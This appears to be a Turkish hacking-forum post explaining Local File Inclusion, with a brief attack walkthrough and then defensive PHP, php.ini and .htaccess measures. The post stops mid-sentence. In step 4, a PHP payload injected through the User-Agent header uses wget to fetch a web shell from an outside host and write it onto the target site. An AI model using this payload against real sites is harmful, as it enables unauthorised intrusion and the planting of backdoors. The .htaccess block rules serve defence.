Neler yeni

#97 LFI Zafiyeti Nedir?/Nasıl Kullanılır? (1 Viewer)

Mesajlar
197
Credits
2,554
İşleyiş:
LFİ tam adı ile Local File Inclusion (Yerel Dosya Dahil Etme)
Saldırgan sunucuyu kandırarak sunucuda bulunan dosyalara sızar.Klasik bir LFİ dosya yolunu girdi olarak kullanır (url) ve site bu girişi güvenli kabul ederse LFİ işlemi başarılı bir şekilde gerçekleşir ve site sunucusundaki verileri ortaya çıkarırız.
------------ ------- -------- ----------- ----- ------- ----
Example Domain
Bu örnekte ise görmüş olduğunuz saldırgan sunucuya sızmış yani etc/passwd'a sızmış bulunmakta eğer sitede yetkiler ayarlanmamış ise saldırgan izinlere / yasaklı kişilere ve birçok izin vb. üzerinde değişiklik yapabilir/dosya upload edebilir.
------------ -------------- ------------------
Saldırı kısmı:
Saldırı kısmını hızlıca gecicem çünkü çoğu yerde aynı teknik kullanılıyor maksat anlayalım.
----
1) Öncellikle Firefox-Cyberfox Tarayıcımızı Açıp Açık Bulduğunuz Siteye Giriyoruz

2) Sitemizi Açtıktan Sonra Tarayıcımızın Üst Kısmında Eklentiler Sekmesi Mevcut. Ona Tıklayıp Tamper Datamızı Açıyoruz.

3) Start Tamper Diyip Sayfamızı Yeniliyoruz. Gelen Uyarıya Tamper Diyoruz.

4) User Agent Yazan Kısma <?system(’wget http://lfisitesi.com/shelliniz.php -o shell.php’);?> Yazıp Siteye Shellimizi Upload Ediyoruz.
==== === ==== === ===== = ===== ==
LFİ'den sitemizi korumak:

Kod açıkları:
Yazılan kodların RFI açıklarına karşı kontrol edilmesi.
Zayıf Kod Örneği:
<?php
include ($ornek. ‘../index.php’);
?>
Güvenli kod örneği :
<?php
$ornek= ‘veri’;
include ($ornek. ‘../index.php’);
?>
örnek değişkenine tanımlama yapıldığından dış verinin girişine izin vermeyecek ve RFI & LFI açıklarından korunmamızı sağlayacaktır.

Yöntem 2
php.ini
/etc/php.ini
dosyasının içini açarak disable_function değerinin yanına aşağıda belirtilen özellikleri yazarak web shell scriptçiklerinin etkisiz kalmaları sağlanabilir:
disable_function = system, passthru, exec, popen, proc_clos vb . . .

Yöntem 3
FTP bağlantısı sağlayıp htaccess dosyanıza LFI(Local File Include) saldırı korumaları için ekleyiniz.
.htaccess
Options +Followsymlinks
RewriteEngine On
RewriteCond %{REQUEST_URI} passwd
RewriteRule ^(.*)$ - [F,L]
RewriteEngine On
RewriteCond %{REQUEST_URI} shadow
RewriteRule ^(.*)$ - [F,L]
//bu örnek kuralları ekleyerek sunucunuzdaki kritik dosyalarınıza web üzerinden yetkisiz erişimleri engelleyebilirsiniz.
PHP:
RewriteCond %{REQUEST_METHOD} GET RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR] RewriteRule .* – [F]

======== ======= ======= ======== Evet arkadaşlar size bu
 

Bu konuyu görüntüleyen kullanıcılar